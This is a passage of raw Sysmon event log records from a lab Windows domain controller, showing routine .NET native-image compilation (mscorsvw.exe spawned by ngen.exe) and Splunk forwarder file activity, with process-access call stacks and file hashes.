c.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020690Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:21.150{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D5-60D3-AE03-00000000CF01}6980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020689Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:21.134{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D5-60D3-AE03-00000000CF01}6980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020688Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:21.134{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D5-60D3-AE03-00000000CF01}6980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020687Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:21.087{4DB9351A-A1D4-60D3-AD03-00000000CF01}6300C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\189c-0\Microsoft.PowerShell.Utility.Activities.dll2021-06-23 21:04:21.087 23542300x800000000000000020686Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:21.056{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=506D8C007B724F73E678E0DD848F0CEC,SHA256=D598B04F28150F93704916CA2A3130E36BA62F02112BE1EFD8B14A414A15CE1D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020703Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:22.634{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D6-60D3-B103-00000000CF01}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020702Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:22.618{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D6-60D3-B103-00000000CF01}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020701Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:22.618{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D6-60D3-B103-00000000CF01}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020700Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:22.540{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=475290C51326D3F5B504468A6AABEB4F,SHA256=F653B1F64CB92E96FB53A0FC4B4AF691599EC2DE4C02008FCE54CF60CA00C701,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x800000000000000020699Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:22.415{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D6-60D3-B003-00000000CF01}3016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020698Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:22.368{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D6-60D3-B003-00000000CF01}3016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020697Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:22.368{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D6-60D3-B003-00000000CF01}3016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020696Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:22.275{4DB9351A-A1D5-60D3-AF03-00000000CF01}5364C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\14f4-0\Microsoft.PowerShell.Workflow.ServiceCore.dll2021-06-23 21:04:22.275 23542300x800000000000000020695Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:22.181{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3624D922FBD17E53E588BE1A02E01CE3,SHA256=7E3F2BD287210A1C1FD6CB5825FFBD6848B4D821B3A3D170677F9C698169875F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020732Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.978{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1D7-60D3-B903-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020731Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.978{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D7-60D3-B903-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Fr
amework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020730Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.946{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D7-60D3-B803-00000000CF01}3940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020729Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.915{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1D7-60D3-B803-00000000CF01}3940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020728Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:23.915{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D7-60D3-B803-00000000CF01}3940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020727Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:23.900{4DB9351A-A1D7-60D3-B703-00000000CF01}4784C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\12b0-0\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll2021-06-23 21:04:23.900 10341000x800000000000000020726Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:23.868{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D7-60D3-B703-00000000CF01}4784C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020725Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.853{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D7-60D3-B703-00000000CF01}4784C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020724Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:23.853{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D7-60D3-B703-00000000CF01}4784C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020723Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:23.824{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D7-60D3-B603-00000000CF01}4844C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020722Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.790{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1D7-60D3-B603-00000000CF01}4844C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020721Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:23.790{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D7-60D3-B603-00000000CF01}4844C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020720Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:23.775{4DB9351A-A1D7-60D3-B503-00000000CF01}7032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b78-0\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll2021-06-23 21:04:23.775 23542300x800000000000000020719Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
